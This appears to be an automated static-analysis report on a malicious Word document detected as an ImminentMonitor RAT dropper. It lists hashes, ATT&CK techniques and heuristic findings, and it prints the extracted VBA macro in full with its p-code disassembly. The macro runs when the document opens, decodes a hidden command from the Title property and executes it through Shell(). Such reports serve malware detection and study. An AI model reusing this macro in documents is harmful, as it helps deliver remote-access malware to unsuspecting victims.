Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d9f3fe32e05d7183…

MALICIOUS

Office (OLE)

Size: 40.5 KB
Created: 2018-02-02 10:00:00
Authoring application: Microsoft Office Word
First seen: 2018-08-05
MD5: 7330d974021d2053418ec67e373cb401
SHA-1: 3d0b7ef9e8f367ef241e415b88c4720e01a993aa
SHA-256: d9f3fe32e05d7183136f3885758078250862978367361639200cff4b8f2b7415
Risk Score: 230

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample contains a VBA macro that is triggered by the Document_Open event. This macro decodes a string and uses the Shell() function to execute it, likely downloading and running a second-stage payload. The ClamAV detection name 'Doc.Dropper.ImminentMonitorRAT-10018167-0' further supports its nature as a dropper.

Heuristics (8)

  • ClamAV: Doc.Dropper.ImminentMonitorRAT-10018167-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.ImminentMonitorRAT-10018167-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            ltrbknyfz = StrConv(karsri, vbUnicode)
            Shell (Replace(Replace(Split(ltrbknyfz, Chr(124))(1), Split(ltrbknyfz, Chr(124))(0), Chr(46)), "FP" + "ATH", ActiveDocument.path & Application.PathSeparator & ActiveDocument.Name)), 0
    End Sub
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
            efsv = ThisDocument.BuiltInDocumentProperties("Tit" + "le")
  • NOP-equivalent sled detected [medium] SC_NOP_EQUIV_SLED
    Long run of 0x61 bytes
    Disassembly
    Attempted x86 opcode disassembly (96 consecutive 0x61 bytes, offsets 00004708 through 00004767, each decoding as popal)
    00004708  61                popal
    00004709  61                popal
    0000470A  61                popal
    ...
    00004766  61                popal
    00004767  61                popal
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2733 bytes
SHA-256: e4fab99b1e601be23aea38196e337d6138c32ba2df684e6edf3c1bb9c08b521c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
        efsv = ThisDocument.BuiltInDocumentProperties("Tit" + "le")
        Dim ltrbknyfz As String
        Dim shmoo As String
        shmoo = StrReverse(efsv)
        Dim karsri() As Byte
        karsri = StrConv(shmoo, vbFromUnicode)
        Dim tdqdokgvtdus As Long
        For tdqdokgvtdus = 0 To UBound(karsri)
                karsri(tdqdokgvtdus) = karsri(tdqdokgvtdus) - 9 + 2
        Next tdqdokgvtdus
        ltrbknyfz = StrConv(karsri, vbUnicode)
        Shell (Replace(Replace(Split(ltrbknyfz, Chr(124))(1), Split(ltrbknyfz, Chr(124))(0), Chr(46)), "FP" + "ATH", ActiveDocument.path & Application.PathSeparator & ActiveDocument.Name)), 0
End Sub

' Processing file: /tmp/qstore_whyi1s96
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4190 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	LitStr 0x0003 "Tit"
' 	LitStr 0x0002 "le"
' 	Add 
' 	Ld ThisDocument 
' 	ArgsMemLd BuiltInDocumentProperties 0x0001 
' 	St hlitb 
' Line #2:
' 	Dim 
' 	VarDefn efsv (As String)
' Line #3:
' 	Dim 
' 	VarDefn ltrbknyfz (As String)
' Line #4:
' 	Ld hlitb 
' 	ArgsLd StrReverse 0x0001 
' 	St ltrbknyfz 
' Line #5:
' 	Dim 
' 	VarDefn shmoo (As Byte)
' Line #6:
' 	Ld ltrbknyfz 
' 	Ld vbFromUnicode 
' 	ArgsLd StrConv 0x0002 
' 	St shmoo 
' Line #7:
' 	Dim 
' 	VarDefn karsri (As Long)
' Line #8:
' 	StartForVariable 
' 	Ld karsri 
' 	EndForVariable 
' 	LitDI2 0x0000 
' 	Ld shmoo 
' 	FnUBound 0x0000 
' 	For 
' Line #9:
' 	Ld karsri 
' 	ArgsLd shmoo 0x0001 
' 	LitDI2 0x0009 
' 	Sub 
' 	LitDI2 0x0002 
' 	Add 
' 	Ld karsri 
' 	ArgsSt shmoo 0x0001 
' Line #10:
' 	StartForVariable 
' 	Ld karsri 
' 	EndForVariable 
' 	NextVar 
' Line #11:
' 	Ld shmoo 
' 	Ld vbUnicode 
' 	ArgsLd StrConv 0x0002 
' 	St efsv 
' Line #12:
' 	LitDI2 0x0001 
' 	Ld efsv 
' 	LitDI2 0x007C 
' 	ArgsLd Chr 0x0001 
' 	ArgsLd Split 0x0002 
' 	IndexLd 0x0001 
' 	LitDI2 0x0000 
' 	Ld efsv 
' 	LitDI2 0x007C 
' 	ArgsLd Chr 0x0001 
' 	ArgsLd Split 0x0002 
' 	IndexLd 0x0001 
' 	LitDI2 0x002E 
' 	ArgsLd Chr 0x0001 
' 	ArgsLd Replace 0x0003 
' 	LitStr 0x0002 "FP"
' 	LitStr 0x0003 "ATH"
' 	Add 
' 	Ld ActiveDocument 
' 	MemLd path 
' 	Ld Application 
' 	MemLd PathSeparator 
' 	Concat 
' 	Ld ActiveDocument 
' 	MemLd Name 
' 	Concat 
' 	ArgsLd Replace 0x0003 
' 	Paren 
' 	LitDI2 0x0000 
' 	ArgsCall Shell 0x0002 
' Line #13:
' 	EndSub